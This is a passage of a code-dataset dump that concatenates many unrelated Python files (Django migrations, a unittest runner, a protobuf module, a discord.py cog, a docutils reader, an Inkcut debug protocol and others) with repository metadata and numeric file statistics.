print_sm4_data() | 57.602778 | 185 | 0.401601 | 2,196 | 20,737 | 3.739526 | 0.1102 | 0.027034 | 0.032879 | 0.014613 | 0.515952 | 0.369216 | 0.285192 | 0.176084 | 0.163663 | 0.118363 | 0 | 0.274107 | 0.488402 | 20,737 | 360 | 186 | 57.602778 | 0.499953 | 0.417032 | 0 | 0.36 | 0 | 0 | 0.024479 | 0.011605 | 0 | 0 | 0.136355 | 0 | 0.005 | 1 | 0.025 | false | 0 | 0.005 | 0 | 0.04 | 0.065 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ad651f61bd321ebea386f33585e8cf5eacb6acdb | 894 | py | Python | src/data_hub/lcd/migrations/0053_alter_collectionfootprint_the_geom.py | TNRIS/api.tnris.org | 46620a4edf0682c158907f110158110801e9c398 | [
"MIT"
] | 6 | 2019-05-22T20:01:45.000Z | 2020-08-18T12:05:12.000Z | src/data_hub/lcd/migrations/0053_alter_collectionfootprint_the_geom.py | TNRIS/api.tnris.org | 46620a4edf0682c158907f110158110801e9c398 | [
"MIT"
] | 73 | 2019-05-22T19:57:30.000Z | 2022-03-12T00:59:33.000Z | src/data_hub/lcd/migrations/0053_alter_collectionfootprint_the_geom.py | TNRIS/api.tnris.org | 46620a4edf0682c158907f110158110801e9c398 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-08-10 20:12
import django.contrib.gis.db.models.fields
import django.contrib.gis.geos.collections
import django.contrib.gis.geos.polygon
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('lcd', '0052_alter_collectionfootprint_the_geom'),
]
operations = [
migrations.AlterField(
model_name='collectionfootprint',
name='the_geom',
field=django.contrib.gis.db.models.fields.MultiPolygonField(default=django.contrib.gis.geos.collections.MultiPolygon(django.contrib.gis.geos.polygon.Polygon(((-107.05078125, 25.60190226111573), (-93.07617187499999, 25.60190226111573), (-93.07617187499999, 36.66841891894786), (-107.05078125, 36.66841891894786), (-107.05078125, 25.60190226111573)))), null=True, srid=4326, verbose_name='The Geometry'),
),
]
| 40.636364 | 414 | 0.722595 | 105 | 894 | 6.085714 | 0.514286 | 0.122066 | 0.150235 | 0.125196 | 0.29421 | 0.093897 | 0 | 0 | 0 | 0 | 0 | 0.219608 | 0.144295 | 894 | 21 | 415 | 42.571429 | 0.615686 | 0.050336 | 0 | 0 | 1 | 0 | 0.095632 | 0.046045 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.266667 | 0 | 0.466667 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ad72b53c026f5b811aebd943c7bb216b2e4dff3e | 726 | py | Python | unittest/test_unittest_runner.py | asisudai/practical_pipeline | 09b106dc70d0d9abf7bca117346e796ad542d534 | [
"MIT"
] | 3 | 2019-05-28T22:29:38.000Z | 2020-04-26T19:03:01.000Z | unittest/test_unittest_runner.py | asisudai/practical_pipeline | 09b106dc70d0d9abf7bca117346e796ad542d534 | [
"MIT"
] | null | null | null | unittest/test_unittest_runner.py | asisudai/practical_pipeline | 09b106dc70d0d9abf7bca117346e796ad542d534 | [
"MIT"
] | 1 | 2019-09-01T15:53:36.000Z | 2019-09-01T15:53:36.000Z | #!/usr/bin/env python
import unittest
# import your test modules
import test_unittest_01
import test_unittest_02
import test_unittest_03
import test_unittest_04
if __name__ == '__main__':
# initialize the test suite
loader = unittest.TestLoader()
suite = unittest.TestSuite()
# add tests to the test suite
suite.addTests(loader.loadTestsFromModule(test_unittest_01))
suite.addTests(loader.loadTestsFromModule(test_unittest_02))
suite.addTests(loader.loadTestsFromModule(test_unittest_03))
suite.addTests(loader.loadTestsFromModule(test_unittest_04))
# initialize a runner, pass it your suite and run it
runner = unittest.TextTestRunner(verbosity=3)
result = runner.run(suite)
| 29.04 | 64 | 0.77135 | 92 | 726 | 5.826087 | 0.402174 | 0.179104 | 0.134328 | 0.283582 | 0.373134 | 0.373134 | 0 | 0 | 0 | 0 | 0 | 0.027597 | 0.151515 | 726 | 24 | 65 | 30.25 | 0.842532 | 0.206612 | 0 | 0 | 0 | 0 | 0.014011 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.357143 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
ad88dd61bbd09019864be52cbe4cf8c91fba88d8 | 337 | py | Python | accelerator/models/ethno_racial_identity.py | masschallenge/django-accelerator | 8af898b574be3b8335edc8961924d1c6fa8b5fd5 | [
"MIT"
] | 6 | 2017-06-14T19:34:01.000Z | 2020-03-08T07:16:59.000Z | accelerator/models/ethno_racial_identity.py | masschallenge/django-accelerator | 8af898b574be3b8335edc8961924d1c6fa8b5fd5 | [
"MIT"
] | 160 | 2017-06-20T17:12:13.000Z | 2022-03-30T13:53:12.000Z | accelerator/models/ethno_racial_identity.py | masschallenge/django-accelerator | 8af898b574be3b8335edc8961924d1c6fa8b5fd5 | [
"MIT"
] | null | null | null | import swapper
from accelerator_abstract.models.base_ethno_racial_identity import (
BaseEthnoRacialIdentity,
)
class EthnoRacialIdentity(BaseEthnoRacialIdentity):
class Meta(BaseEthnoRacialIdentity.Meta):
swappable = swapper.swappable_setting(
BaseEthnoRacialIdentity.Meta.app_label, 'EthnoRacialIdentity')
| 30.636364 | 74 | 0.79822 | 28 | 337 | 9.392857 | 0.642857 | 0.212928 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.139466 | 337 | 10 | 75 | 33.7 | 0.906897 | 0 | 0 | 0 | 0 | 0 | 0.05638 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ad93a1fe02a22cf958094f14b1d5c32570598491 | 318 | py | Python | src/test.py | qitar888/ga2016_final_project | f573f683cc2b5cb73a863f3e83f90fc3ced6454a | [
"MIT"
] | null | null | null | src/test.py | qitar888/ga2016_final_project | f573f683cc2b5cb73a863f3e83f90fc3ced6454a | [
"MIT"
] | null | null | null | src/test.py | qitar888/ga2016_final_project | f573f683cc2b5cb73a863f3e83f90fc3ced6454a | [
"MIT"
] | null | null | null | import cost_function as cf
import pic
target_image = pic.pic2rgb("../data/img03.jpg", 50, 50)
cf.set_target_image(target_image)
s = "(H 0.73 (V 0.451 (H 0.963 (L color)(L color))(V 0.549 (L color)(L color)))(L color))"
matrix = cf.to_array(s, 50, 50, 1)
#print(matrix)
pic.rgb2pic(matrix, 'LAB', "./master_piece.png")
| 35.333333 | 90 | 0.68239 | 62 | 318 | 3.387097 | 0.548387 | 0.142857 | 0.1 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0.119497 | 318 | 8 | 91 | 39.75 | 0.65 | 0.040881 | 0 | 0 | 0 | 0.142857 | 0.401316 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ad974a16f5e2eba5c65ce3b727dca372dec76010 | 1,353 | py | Python | cloudkittyclient/v1/info.py | mmariani/python-cloudkittyclient | 92f51ded48b261231f226669f75c52f199584d5c | [
"Apache-2.0"
] | null | null | null | cloudkittyclient/v1/info.py | mmariani/python-cloudkittyclient | 92f51ded48b261231f226669f75c52f199584d5c | [
"Apache-2.0"
] | null | null | null | cloudkittyclient/v1/info.py | mmariani/python-cloudkittyclient | 92f51ded48b261231f226669f75c52f199584d5c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2018 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from cloudkittyclient.v1 import base
class InfoManager(base.BaseManager):
"""Class used to handle /v1/info endpoint"""
url = '/v1/info/{endpoint}/{metric_name}'
def get_metric(self, **kwargs):
"""Returns info for the given service.
If metric_name is not specified, returns info for all services.
:param metric_name: Name of the service on which you want information
:type metric_name: str
"""
url = self.get_url('metrics', kwargs)
return self.api_client.get(url).json()
def get_config(self, **kwargs):
"""Returns the current configuration."""
url = self.get_url('config', kwargs)
return self.api_client.get(url).json()
| 35.605263 | 78 | 0.679231 | 188 | 1,353 | 4.835106 | 0.56383 | 0.066007 | 0.028603 | 0.035204 | 0.077008 | 0.077008 | 0.077008 | 0.077008 | 0 | 0 | 0 | 0.011429 | 0.223947 | 1,353 | 37 | 79 | 36.567568 | 0.854286 | 0.643755 | 0 | 0.222222 | 0 | 0 | 0.109785 | 0.078759 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
ad9d9fb7a38ac292e01525e196638ba0f6d199ab | 2,303 | py | Python | pyatv/protocols/mrp/protobuf/PlayerClientPropertiesMessage_pb2.py | crxporter/pyatv | e694a210b3810c64044116bf40e7b75420b5fe75 | [
"MIT"
] | null | null | null | pyatv/protocols/mrp/protobuf/PlayerClientPropertiesMessage_pb2.py | crxporter/pyatv | e694a210b3810c64044116bf40e7b75420b5fe75 | [
"MIT"
] | null | null | null | pyatv/protocols/mrp/protobuf/PlayerClientPropertiesMessage_pb2.py | crxporter/pyatv | e694a210b3810c64044116bf40e7b75420b5fe75 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: pyatv/protocols/mrp/protobuf/PlayerClientPropertiesMessage.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from pyatv.protocols.mrp.protobuf import ProtocolMessage_pb2 as pyatv_dot_protocols_dot_mrp_dot_protobuf_dot_ProtocolMessage__pb2
from pyatv.protocols.mrp.protobuf import PlayerPath_pb2 as pyatv_dot_protocols_dot_mrp_dot_protobuf_dot_PlayerPath__pb2
DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n@pyatv/protocols/mrp/protobuf/PlayerClientPropertiesMessage.proto\x1a\x32pyatv/protocols/mrp/protobuf/ProtocolMessage.proto\x1a-pyatv/protocols/mrp/protobuf/PlayerPath.proto\"^\n\x1dPlayerClientPropertiesMessage\x12\x1f\n\nplayerPath\x18\x01 \x01(\x0b\x32\x0b.PlayerPath\x12\x1c\n\x14lastPlayingTimestamp\x18\x02 \x01(\x01:W\n\x1dplayerClientPropertiesMessage\x12\x10.ProtocolMessage\x18V \x01(\x0b\x32\x1e.PlayerClientPropertiesMessage')
PLAYERCLIENTPROPERTIESMESSAGE_FIELD_NUMBER = 86
playerClientPropertiesMessage = DESCRIPTOR.extensions_by_name['playerClientPropertiesMessage']
_PLAYERCLIENTPROPERTIESMESSAGE = DESCRIPTOR.message_types_by_name['PlayerClientPropertiesMessage']
PlayerClientPropertiesMessage = _reflection.GeneratedProtocolMessageType('PlayerClientPropertiesMessage', (_message.Message,), {
'DESCRIPTOR' : _PLAYERCLIENTPROPERTIESMESSAGE,
'__module__' : 'pyatv.protocols.mrp.protobuf.PlayerClientPropertiesMessage_pb2'
# @@protoc_insertion_point(class_scope:PlayerClientPropertiesMessage)
})
_sym_db.RegisterMessage(PlayerClientPropertiesMessage)
if _descriptor._USE_C_DESCRIPTORS == False:
pyatv_dot_protocols_dot_mrp_dot_protobuf_dot_ProtocolMessage__pb2.ProtocolMessage.RegisterExtension(playerClientPropertiesMessage)
DESCRIPTOR._options = None
_PLAYERCLIENTPROPERTIESMESSAGE._serialized_start=167
_PLAYERCLIENTPROPERTIESMESSAGE._serialized_end=261
# @@protoc_insertion_point(module_scope)
| 57.575 | 500 | 0.860617 | 246 | 2,303 | 7.715447 | 0.345528 | 0.044257 | 0.073762 | 0.079031 | 0.246048 | 0.18177 | 0.082719 | 0.082719 | 0.082719 | 0.082719 | 0 | 0.027252 | 0.059922 | 2,303 | 39 | 501 | 59.051282 | 0.849423 | 0.14112 | 0 | 0 | 1 | 0.045455 | 0.308592 | 0.296899 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.318182 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
ad9e41e35c13ed20157dba440d5e3dc168b4b9c8 | 524 | py | Python | app_challenges_sections_units/migrations/0036_auto_20190619_1903.py | Audiotuete/backend_wagtail_api | 3c5a4a610ffdbb75d45a57fc670e2ae3b7178c62 | [
"MIT"
] | null | null | null | app_challenges_sections_units/migrations/0036_auto_20190619_1903.py | Audiotuete/backend_wagtail_api | 3c5a4a610ffdbb75d45a57fc670e2ae3b7178c62 | [
"MIT"
] | null | null | null | app_challenges_sections_units/migrations/0036_auto_20190619_1903.py | Audiotuete/backend_wagtail_api | 3c5a4a610ffdbb75d45a57fc670e2ae3b7178c62 | [
"MIT"
] | null | null | null | # Generated by Django 2.0.8 on 2019-06-19 19:03
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('wagtailimages', '0001_squashed_0021'),
('app_challenges_sections_units', '0035_auto_20190619_1847'),
]
operations = [
migrations.RenameModel(
old_name='Slideshow',
new_name='Gallery',
),
migrations.RenameModel(
old_name='SlideshowImage',
new_name='GalleryImage',
),
]
| 22.782609 | 69 | 0.603053 | 51 | 524 | 5.960784 | 0.764706 | 0.138158 | 0.157895 | 0.184211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104558 | 0.288168 | 524 | 22 | 70 | 23.818182 | 0.710456 | 0.085878 | 0 | 0.25 | 1 | 0 | 0.262055 | 0.109015 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a8ebf8bbb141395df211d1beccebe31440e682f7 | 109 | py | Python | chk.py | benhur98/GazeUI_RH3 | 3e633474bcb78ab30897692fbcb75c8ad1f5c92e | [
"MIT"
] | null | null | null | chk.py | benhur98/GazeUI_RH3 | 3e633474bcb78ab30897692fbcb75c8ad1f5c92e | [
"MIT"
] | null | null | null | chk.py | benhur98/GazeUI_RH3 | 3e633474bcb78ab30897692fbcb75c8ad1f5c92e | [
"MIT"
] | null | null | null | import numpy as np
a=np.load("train-data-{}.npy".format(input()))
while 1:
print(a[int(input())][1])
| 21.8 | 47 | 0.605505 | 19 | 109 | 3.473684 | 0.789474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021505 | 0.146789 | 109 | 4 | 48 | 27.25 | 0.688172 | 0 | 0 | 0 | 0 | 0 | 0.161905 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a8f571492f94df0b230565b81e8284f0b4160ad7 | 1,994 | py | Python | cogs/StatCollector.py | galaxyAbstractor/rvnBot | a013b92c924cc218811e801680bf7d4318406a4c | [
"MIT"
] | null | null | null | cogs/StatCollector.py | galaxyAbstractor/rvnBot | a013b92c924cc218811e801680bf7d4318406a4c | [
"MIT"
] | null | null | null | cogs/StatCollector.py | galaxyAbstractor/rvnBot | a013b92c924cc218811e801680bf7d4318406a4c | [
"MIT"
] | null | null | null | from discord import TextChannel
from discord.ext import commands
from stats import StatService
from users import UserService
class StatCollector(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.stats = StatService(bot.pool)
self.users = UserService(bot.pool)
@commands.Cog.listener()
async def on_message(self, message):
if message.author == self.bot.user:
return
if not isinstance(message.channel, TextChannel):
return
await self.stats.handle_message_stat(message)
@commands.Cog.listener()
async def on_typing(self, channel, user, when):
if user == self.bot.user:
return
if not isinstance(channel, TextChannel):
return
@commands.Cog.listener()
async def on_raw_message_delete(self, payload):
message = payload.cached_message
return
@commands.Cog.listener()
async def on_raw_bulk_message_delete(self, payload):
messages = payload.cached_messages
return
@commands.Cog.listener()
async def on_raw_message_edit(self, payload):
messages = payload.cached_messages
return
@commands.Cog.listener()
async def on_reaction_add(self, reaction, user):
return
@commands.Cog.listener()
async def on_reaction_remove(self, reaction, user):
return
@commands.Cog.listener()
async def on_member_join(self, member):
return
@commands.Cog.listener()
async def on_member_remove(self, member):
return
@commands.Cog.listener()
async def on_member_update(self, member):
return
@commands.Cog.listener()
async def on_user_update(self, user):
return
@commands.Cog.listener()
async def on_member_ban(self, guild, user):
return
@commands.Cog.listener()
async def on_member_unban(self, guild, user):
return
def setup(bot):
bot.add_cog(StatCollector(bot))
| 23.458824 | 56 | 0.654965 | 240 | 1,994 | 5.283333 | 0.2125 | 0.121451 | 0.194795 | 0.246057 | 0.572555 | 0.572555 | 0.526814 | 0.476341 | 0.433754 | 0.27918 | 0 | 0 | 0.253761 | 1,994 | 84 | 57 | 23.738095 | 0.852151 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.066667 | 0 | 0.366667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a8fcc6ac8aab4f48607db30ce376a669495d6728 | 229 | py | Python | lorem/data.py | Ahsoka/python-lorem | 5252a5819fcdf87955794a4f1d06284d152e2c8a | [
"MIT"
] | 21 | 2016-06-16T22:33:40.000Z | 2022-03-13T22:56:39.000Z | lorem/data.py | Ahsoka/python-lorem | 5252a5819fcdf87955794a4f1d06284d152e2c8a | [
"MIT"
] | null | null | null | lorem/data.py | Ahsoka/python-lorem | 5252a5819fcdf87955794a4f1d06284d152e2c8a | [
"MIT"
] | 10 | 2017-02-09T14:33:02.000Z | 2021-08-07T15:02:04.000Z | WORDS = ("adipisci aliquam amet consectetur dolor dolore dolorem eius est et"
"incidunt ipsum labore magnam modi neque non numquam porro quaerat qui"
"quia quisquam sed sit tempora ut velit voluptatem").split()
| 57.25 | 80 | 0.733624 | 31 | 229 | 5.419355 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.213974 | 229 | 3 | 81 | 76.333333 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0.803493 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a8fdf92716ffae4bc0c6399c929dc082d01dc0eb | 886 | py | Python | motto/readers.py | attakei/jamproject | f3a677f4f95c112b89fb38957e6ba1a3c923ea85 | [
"Apache-2.0"
] | null | null | null | motto/readers.py | attakei/jamproject | f3a677f4f95c112b89fb38957e6ba1a3c923ea85 | [
"Apache-2.0"
] | 1 | 2020-01-05T14:04:35.000Z | 2020-01-05T14:04:35.000Z | motto/readers.py | attakei/motto | f3a677f4f95c112b89fb38957e6ba1a3c923ea85 | [
"Apache-2.0"
] | null | null | null | """Core custom readers for docutils
"""
from typing import List, Type
from docutils import readers
from docutils.transforms import Transform
from .skill import SkillBase
from .transforms import InitializeReportTransform, TokenizeTransform
class Reader(readers.Reader):
"""Basic custom reader class.
Includes
- Tokenize transform
- Skills
"""
def __init__(self, parser=None, parser_name=None):
super().__init__(parser=parser, parser_name=parser_name)
self._skills: List[SkillBase] = []
def add_skill(self, skill: SkillBase):
self._skills.append(skill)
def get_transforms(self) -> List[Type[Transform]]:
"""Return all transforms.
"""
transforms = super().get_transforms()
transforms += [TokenizeTransform, InitializeReportTransform]
transforms += self._skills
return transforms
| 27.6875 | 68 | 0.694131 | 92 | 886 | 6.5 | 0.369565 | 0.050167 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209932 | 886 | 31 | 69 | 28.580645 | 0.854286 | 0.147856 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.3125 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
d10f214ef69fa8548dfc5cc8ae64127b9968d418 | 376 | py | Python | tests/bitly/*REPL* [python].py | goldsborough/lnk | 1487d272a70329571c77c0ec17c394dc6a1d088f | [
"MIT"
] | 3 | 2017-06-16T18:51:54.000Z | 2018-04-08T19:36:12.000Z | tests/bitly/*REPL* [python].py | goldsborough/lnk | 1487d272a70329571c77c0ec17c394dc6a1d088f | [
"MIT"
] | 2 | 2021-02-08T20:17:54.000Z | 2021-04-30T20:35:44.000Z | tests/bitly/*REPL* [python].py | goldsborough/lnk | 1487d272a70329571c77c0ec17c394dc6a1d088f | [
"MIT"
] | 1 | 2019-11-06T19:05:30.000Z | 2019-11-06T19:05:30.000Z | Python 3.5.0 (default, Sep 14 2015, 02:37:27)
[GCC 4.2.1 Compatible Apple LLVM 6.1.0 (clang-602.0.53)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> a = [{'a': 1}, {'b': 2}]
>>> sorted(a)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: unorderable types: dict() < dict()
>>> b = [{'b': 2}, {'a': 1}] | 41.777778 | 70 | 0.606383 | 64 | 376 | 3.5625 | 0.78125 | 0.017544 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101587 | 0.162234 | 376 | 9 | 71 | 41.777778 | 0.622222 | 0 | 0 | 0 | 0 | 0 | 0.100796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d112e5e4e9404a987fd2539dd0c5729a2d97741e | 210 | py | Python | app/events/client/commands/template.py | Hacker-1202/Selfium | 7e798c23c9f24aacab6f6a485d6355f1045bc65c | [
"MIT"
] | 14 | 2021-11-05T11:27:25.000Z | 2022-02-28T02:04:32.000Z | app/events/client/commands/template.py | CssHammer/Selfium | 7e798c23c9f24aacab6f6a485d6355f1045bc65c | [
"MIT"
] | 2 | 2022-01-24T22:00:44.000Z | 2022-01-31T13:13:27.000Z | app/events/client/commands/template.py | CssHammer/Selfium | 7e798c23c9f24aacab6f6a485d6355f1045bc65c | [
"MIT"
] | 5 | 2022-01-02T13:33:17.000Z | 2022-02-26T13:09:50.000Z | from app.vars.client import client
from app.helpers import Notify, params
from app.filesystem import cfg
@client.command()
async def template(ctx):
notify = Notify(ctx=ctx, title='Template File...')
| 23.333333 | 54 | 0.733333 | 30 | 210 | 5.133333 | 0.566667 | 0.136364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157143 | 210 | 8 | 55 | 26.25 | 0.870057 | 0 | 0 | 0 | 0 | 0 | 0.07619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
d123ae3da1f9bbc3e25f9668062bd9940c2f2120 | 991 | py | Python | inkcut-master/inkcut/device/protocols/debug.py | ilnanny/Inkscape-addons | a30cdde2093fa2da68b90213e057519d0304433f | [
"X11"
] | 3 | 2019-03-08T23:32:29.000Z | 2019-05-11T23:53:46.000Z | inkcut-master/inkcut/device/protocols/debug.py | ilnanny/Inkscape-addons | a30cdde2093fa2da68b90213e057519d0304433f | [
"X11"
] | null | null | null | inkcut-master/inkcut/device/protocols/debug.py | ilnanny/Inkscape-addons | a30cdde2093fa2da68b90213e057519d0304433f | [
"X11"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Created on Oct 23, 2015
@author: jrm
'''
from inkcut.device.plugin import DeviceProtocol
from inkcut.core.utils import async_sleep, log
class DebugProtocol(DeviceProtocol):
""" A protocol that just logs what is called """
def connection_made(self):
log.debug("protocol.connectionMade()")
def move(self, x, y, z, absolute=True):
log.debug("protocol.move({x},{y},{z})".format(x=x, y=y, z=z))
#: Wait some time before we get there
return async_sleep(0.1)
def set_pen(self, p):
log.debug("protocol.set_pen({p})".format(p=p))
def set_velocity(self, v):
log.debug("protocol.set_velocity({v})".format(v=v))
def set_force(self, f):
log.debug("protocol.set_force({f})".format(f=f))
def data_received(self, data):
log.debug("protocol.data_received({}".format(data))
def connection_lost(self):
log.debug("protocol.connection_lost()") | 29.147059 | 69 | 0.619576 | 140 | 991 | 4.292857 | 0.457143 | 0.093178 | 0.186356 | 0.094842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011613 | 0.217962 | 991 | 34 | 70 | 29.147059 | 0.763871 | 0.139253 | 0 | 0 | 0 | 0 | 0.205006 | 0.205006 | 0 | 0 | 0 | 0 | 0 | 1 | 0.388889 | false | 0 | 0.111111 | 0 | 0.611111 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d1308da11d5da22dc10b14287bdad38de1760631 | 1,466 | py | Python | Python3/537.py | rakhi2001/ecom7 | 73790d44605fbd51e8f7e804b9808e364fcfc680 | [
"MIT"
] | 854 | 2018-11-09T08:06:16.000Z | 2022-03-31T06:05:53.000Z | Python3/537.py | rakhi2001/ecom7 | 73790d44605fbd51e8f7e804b9808e364fcfc680 | [
"MIT"
] | 29 | 2019-06-02T05:02:25.000Z | 2021-11-15T04:09:37.000Z | Python3/537.py | rakhi2001/ecom7 | 73790d44605fbd51e8f7e804b9808e364fcfc680 | [
"MIT"
